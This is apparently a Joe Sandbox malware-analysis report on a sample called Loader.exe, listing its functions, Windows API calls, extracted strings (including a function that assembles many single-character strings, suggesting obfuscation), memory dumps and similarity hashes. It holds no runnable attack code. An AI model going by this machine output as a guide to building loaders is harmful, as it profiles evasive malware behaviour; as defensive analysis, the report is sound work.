IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00EC509A,?,?,?,00000055,?,-00000050,?,?), ref: 00ECF85C

Strings

`/, xrefs: 00ECF7D9
utf8, xrefs: 00ECF92E

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: `/$utf8
API String ID: 943130320-1698776066
Opcode ID: fc2b1fcc0a91fda28bef05d4779065690d107dbd4d6fabfcdb0e3e20f5200fba
Instruction ID: d791320c772c534f32b8addf213ff9f6e737cfd5cb08a05f2da01f7cadd8414d
Opcode Fuzzy Hash: fc2b1fcc0a91fda28bef05d4779065690d107dbd4d6fabfcdb0e3e20f5200fba
Instruction Fuzzy Hash: 85510A72600306BADF28AB70CE42FA677EAEF44704F14253EF555B7181F772E9428651

Function 00ED52C1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00ED535D,00000000,?,00EE8180,?,?,?,00ED5294,00000004,InitializeCriticalSectionEx,00EDF434,00EDF43C), ref: 00ED52CE
GetLastError.KERNEL32(?,00ED535D,00000000,?,00EE8180,?,?,?,00ED5294,00000004,InitializeCriticalSectionEx,00EDF434,00EDF43C,00000000,?,00ECAA0C), ref: 00ED52D8
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00ED5300

Strings

api-ms-, xrefs: 00ED52E5

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 5159c55787b82f4dd7a63c7f06201c3c5b1b7b3377dd66f7145bbe8c34d3b9d8
Instruction ID: 07cf2920f4e84a5cd71d15411ade68b03aa3a259977ecd5301c1e9e676e32f96
Opcode Fuzzy Hash: 5159c55787b82f4dd7a63c7f06201c3c5b1b7b3377dd66f7145bbe8c34d3b9d8
Instruction Fuzzy Hash: 85E09A71280348BBEB201F62ED06F183E59AB00B85F100030FA0CBC0E4E7A2EC118544

Function 00ED30BF Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(C4C39003,00000000,00000000,?), ref: 00ED3122

Part of subcall function 00ECAE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ECC6C1,?,00000000,-00000008), ref: 00ECAED2

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00ED3374
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00ED33BA
GetLastError.KERNEL32 ref: 00ED345D

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 54fc6957762ae60531535e2097ba9d12d49e34baf45afbaafda4151dcd9da4bf
Instruction ID: e5605da403aaa1f64bcebd692ed782be8495c8346b4261a6f5617927a93763f1
Opcode Fuzzy Hash: 54fc6957762ae60531535e2097ba9d12d49e34baf45afbaafda4151dcd9da4bf
Instruction Fuzzy Hash: 20D19AB5D042489FCB15CFA8D980AEDBBF5FF08314F28416AE426FB351D630AA46CB51

Function 00ECA0E3 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00ECA1AA
___AdjustPointer.LIBCMT ref: 00ECA1CD
___AdjustPointer.LIBCMT ref: 00ECA269

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: d795a03dca461598cdce4932f74ee096cded75b13c30d624257cb82f2532f7b8
Instruction ID: 98e42fa7bf54e348b2d36df310f500d156dd7e4a7b09d2bda9e0ea0c8b18a3b2
Opcode Fuzzy Hash: d795a03dca461598cdce4932f74ee096cded75b13c30d624257cb82f2532f7b8
Instruction Fuzzy Hash: 1C51E3B26012199FDB298F50DA41FAA77A4FF00318F1C513DE916672A1E733EC42C751

Function 00ED0B86 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00ECAE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ECC6C1,?,00000000,-00000008), ref: 00ECAED2

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00ED0BEA
__dosmaperr.LIBCMT ref: 00ED0BF1
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00ED0C2B
__dosmaperr.LIBCMT ref: 00ED0C32

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 79fa8dc1ea0b7703686d2169e39077123a300fd4f64ef853400894b482df2658
Instruction ID: 872cdd4b14722949a02105bd62a90f311c79c8025c9faf013bcbc47e9373d248
Opcode Fuzzy Hash: 79fa8dc1ea0b7703686d2169e39077123a300fd4f64ef853400894b482df2658
Instruction Fuzzy Hash: 1321C571604215AF9B20AF61C881FABB7A8FF40368F18562EF959F7351D731EC028790

Function 00EC1652 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2dc49a6c42de7eabae79ed87fde655d44bf8a8d9d39a0d9b5701d67dff6c20e
Instruction ID: c1aa0a0b40582f965b0bd822bd5e957fbc1bd7a964daa32d38069cd1a88ccdcd
Opcode Fuzzy Hash: a2dc49a6c42de7eabae79ed87fde655d44bf8a8d9d39a0d9b5701d67dff6c20e
Instruction Fuzzy Hash: EB21D7712002056FDB10AF618E81FAB77ADAF4336871455ADF919F7152E732EC128790

Function 00ED1F7C Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00ED1F84

Part of subcall function 00ECAE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ECC6C1,?,00000000,-00000008), ref: 00ECAED2

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ED1FBC
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ED1FDC

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 9e4058172e66008e31ce9a7924e9e5b40dd5017c95d7b988b8b967861ee1cade
Instruction ID: ab2ef57568631bad7ac03f6b2f6cfa4afaa183c2729defa7f0a949b6ccc34f9a
Opcode Fuzzy Hash: 9e4058172e66008e31ce9a7924e9e5b40dd5017c95d7b988b8b967861ee1cade
Instruction Fuzzy Hash: 9E11E1B250460D7EA62127B25D89CBF6DADCE593AD715203AF906F6241FA318D02D2B2

Function 00EB2A60 Relevance: 6.1, APIs: 4, Instructions: 53threadCOMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 00EB2A8D
GetCurrentThreadId.KERNEL32 ref: 00EB2A9B
std::_Throw_Cpp_error.LIBCPMT ref: 00EB2AB4
std::_Throw_Cpp_error.LIBCPMT ref: 00EB2AF3

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$CurrentThread
String ID:
API String ID: 2261580123-0
Opcode ID: 8d3fb30bb704b55e7ebd4147ab6a1a317fd3c95c196d0ba022755a3bcf04b384
Instruction ID: 1595750cefe9c647a65e3d424e080e96f646a044b0a6683ba80cadb26087b18b
Opcode Fuzzy Hash: 8d3fb30bb704b55e7ebd4147ab6a1a317fd3c95c196d0ba022755a3bcf04b384
Instruction Fuzzy Hash: 6221E2B4E042098FCB08EFA8C5956AEFBF0BF48300F11946DE899AB351D7389941CF51

Function 00EDA470 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00ED9952,00000000,00000001,?,?,?,00ED34B1,?,00000000,00000000), ref: 00EDA487
GetLastError.KERNEL32(?,00ED9952,00000000,00000001,?,?,?,00ED34B1,?,00000000,00000000,?,?,?,00ED2DF7,?), ref: 00EDA493

Part of subcall function 00EDA4E4: CloseHandle.KERNEL32(FFFFFFFE,00EDA4A3,?,00ED9952,00000000,00000001,?,?,?,00ED34B1,?,00000000,00000000,?,?), ref: 00EDA4F4

___initconout.LIBCMT ref: 00EDA4A3

Part of subcall function 00EDA4C5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EDA461,00ED993F,?,?,00ED34B1,?,00000000,00000000,?), ref: 00EDA4D8

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00ED9952,00000000,00000001,?,?,?,00ED34B1,?,00000000,00000000,?), ref: 00EDA4B8

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 9747a534bedf4f6d0fa62f3231d84df37174e45cf3080de2803728994b048900
Instruction ID: 6b04e7323492d622e264a5561302be2db0275c228075e978de239f970cd69a97
Opcode Fuzzy Hash: 9747a534bedf4f6d0fa62f3231d84df37174e45cf3080de2803728994b048900
Instruction Fuzzy Hash: B9F03736000559BFCF222F92EC4898D3F66FB453A0B054421FE2DA9270D672CA209B95

Function 00EBEFA7 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00EBEFB9
GetCurrentThreadId.KERNEL32 ref: 00EBEFC8
GetCurrentProcessId.KERNEL32 ref: 00EBEFD1
QueryPerformanceCounter.KERNEL32(?), ref: 00EBEFDE

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c943d41eb55bbdd099740aa482ff6ab5d145ae6b00b25e322d8afa725f4b221e
Instruction ID: c5d54e8326a6569928ec6745f661902636bec7c6b875e2a0c649e8d6348f12dc
Opcode Fuzzy Hash: c943d41eb55bbdd099740aa482ff6ab5d145ae6b00b25e322d8afa725f4b221e
Instruction Fuzzy Hash: 51F0B770C0020CEFCB00DFB5C68898EB7F4EF1C200B5149A5A412FB150E730AB44CB50

Function 00ECA7E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00ECA6E1,?,?,00000000,00000000,00000000,?), ref: 00ECA805

Strings

RCC, xrefs: 00ECA81F
MOC, xrefs: 00ECA817

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: f6d812d92e7d29b32cea3cd0e1ebed0dce9b8c1c8d02fa3c25302bb1d5d40534
Instruction ID: cc740fe4c91df9bc188de9ceae4cc15689b3511dd0d2b9dd0ca25584639dd141
Opcode Fuzzy Hash: f6d812d92e7d29b32cea3cd0e1ebed0dce9b8c1c8d02fa3c25302bb1d5d40534
Instruction Fuzzy Hash: BD41797290020DAFCF19CF94CE85EEEBBB5BF48308F189169F90476221D2369952DB51

Function 00ECA04C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00ECA2C3

Strings

csm, xrefs: 00ECA356
csm, xrefs: 00ECA2E5

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 4971009a508608decb0905792cc70625c607c68b3e521e308a6b81d539822e82
Instruction ID: e0e9f786c6a9a36e47238fdfbdd81b44bf3e79a22e98c1165bc2de9d17b6b334
Opcode Fuzzy Hash: 4971009a508608decb0905792cc70625c607c68b3e521e308a6b81d539822e82
Instruction Fuzzy Hash: BE31C03250029CDBCF228F58DA58EAE7B66EB0871DB1C516EFC5429121C337C863DB82

Function 00EB4B10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00EB4B2B

Part of subcall function 00EBBE78: _Yarn.LIBCPMT ref: 00EBBE98
Part of subcall function 00EBBE78: _Yarn.LIBCPMT ref: 00EBBEBC

Strings

bad locale name, xrefs: 00EB4B9B
^I, xrefs: 00EB4B1C

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: Yarn$LockitLockit::_std::_
String ID: ^I$bad locale name
API String ID: 360232963-2946685981
Opcode ID: 888d23aeea5f147a8e6e837095974af9067a113dd5cd6fcef09fa9cd0b2718f3
Instruction ID: 2af3c087ecef989d01c827ad86edf440288a344280d7226125cee870566c833c
Opcode Fuzzy Hash: 888d23aeea5f147a8e6e837095974af9067a113dd5cd6fcef09fa9cd0b2718f3
Instruction Fuzzy Hash: 6B01ED7090410C9BDB08FFA9D4917EEBBF1AF44308F10546CE64677383CA30AA90CB96

Function 00EC1E96 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 00EC1E96
GetCommandLineW.KERNEL32 ref: 00EC1EA1

Strings

P'r, xrefs: 00EC1E9C

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: CommandLine
String ID: P'r
API String ID: 3253501508-4147336663
Opcode ID: 34e36fc1ea25e4987246a7d34e82e1c29810c7ecfcf0a89f2fafb01f0e9b6234
Instruction ID: 6db0906eb897d344540c8f592e4d16fc6c15f05ab70b9240d4bb3a67ef166316
Opcode Fuzzy Hash: 34e36fc1ea25e4987246a7d34e82e1c29810c7ecfcf0a89f2fafb01f0e9b6234
Instruction Fuzzy Hash: F2B048B88587CC8F87008F23B8980043BA0B389A1238000E9F44AAAAB0E67405488F08

Analysis Process: Loader.exePID: 504, Parent PID: 380COMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	7.1%
Signature Coverage:	33.6%
Total number of Nodes:	238
Total number of Limit Nodes:	18

Executed Functions

Function 00411BC0 Relevance: 143.9, APIs: 3, Strings: 78, Instructions: 2186COMMON

Download Yara Rule

Strings

$, xrefs: 004124E9
|, xrefs: 004129C8
a, xrefs: 004134CB
L, xrefs: 00412900
}, xrefs: 004134AB
C, xrefs: 00413533
y, xrefs: 0041348B
j, xrefs: 0041329D
8, xrefs: 004121C2
*, xrefs: 00411CFC
D, xrefs: 004136CB
D, xrefs: 00413B22
i, xrefs: 0041350B
5, xrefs: 00412807
D, xrefs: 00412A82
B, xrefs: 00412910
f, xrefs: 0041316D
?, xrefs: 00412E9C
`, xrefs: 004132DD
l, xrefs: 0041312D
I, xrefs: 004120F2
e, xrefs: 004134EB
w, xrefs: 0041315D
(, xrefs: 004132BD
h, xrefs: 004129E8
7, xrefs: 00411C80
F, xrefs: 00412930
>, xrefs: 00412EDC
e, xrefs: 004126AE
@, xrefs: 004131CD
D, xrefs: 00413B2F
o, xrefs: 004122C5
L, xrefs: 00413523
G, xrefs: 00412938
@, xrefs: 00412920
\, xrefs: 0041322D
8, xrefs: 00413583
g, xrefs: 004126B8
<, xrefs: 00412ECC
g, xrefs: 0041314D
., xrefs: 004131FD
h, xrefs: 004122CA
q, xrefs: 004132AD
M`QW, xrefs: 00412448
(, xrefs: 00412908
f, xrefs: 004129D8
g, xrefs: 00411E3F
*, xrefs: 0041280C
a, xrefs: 0041313D
$, xrefs: 00412928
`, xrefs: 004132CD
E, xrefs: 00412A92
`, xrefs: 00412B6D
', xrefs: 00411FFD
-, xrefs: 00411C26
k, xrefs: 0041351B
4, xrefs: 00412D30
&, xrefs: 004135F3
}, xrefs: 004128F8
c, xrefs: 004134DB
o, xrefs: 0041353B
m, xrefs: 0041352B
9, xrefs: 0041324D
;, xrefs: 0041328D
4, xrefs: 00412802
f, xrefs: 004126B3
3, xrefs: 004127FD
:, xrefs: 00412E8C
[, xrefs: 00412623
{, xrefs: 0041349B
g, xrefs: 004134FB
Z, xrefs: 0041261E
, xrefs: 004129B8
_, xrefs: 004131DD
%JU, xrefs: 004122EC
r, xrefs: 00412619
e, xrefs: 0041317D
D, xrefs: 00412940

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: $$$$$%JU$&$'$($($*$*$-$.$3$4$4$5$7$8$8$9$:$;$<$>$?$@$@$B$C$D$D$D$D$D$E$F$G$I$L$L$M`QW$Z$[$\$_$`$`$`$a$a$c$e$e$e$f$f$f$g$g$g$g$h$h$i$j$k$l$m$o$o$q$r$w$y${$|$}$}
API String ID: 0-362997037
Opcode ID: 4d9be5020c6e82cf067b014f18fe9f73e9b73f1c5d366c73e9ef59bca02c0f63
Instruction ID: 73db62761c6805435fe7a1f262c61e7275afd3a694a408c1188180c8cf5c63de
Opcode Fuzzy Hash: 4d9be5020c6e82cf067b014f18fe9f73e9b73f1c5d366c73e9ef59bca02c0f63
Instruction Fuzzy Hash: 0A13E17160C7C08AD3349B3889443EFBFD1ABD6324F188A2EE5E9873D2D67885858757

Function 004387D0 Relevance: 32.3, APIs: 11, Strings: 7, Instructions: 776
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044368C,00000000,00000001,0044367C), ref: 00438A5F
SysAllocString.OLEAUT32(AF71AD7E), ref: 00438AD5
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438B14
SysAllocString.OLEAUT32(5F8F5D8B), ref: 00438BB5
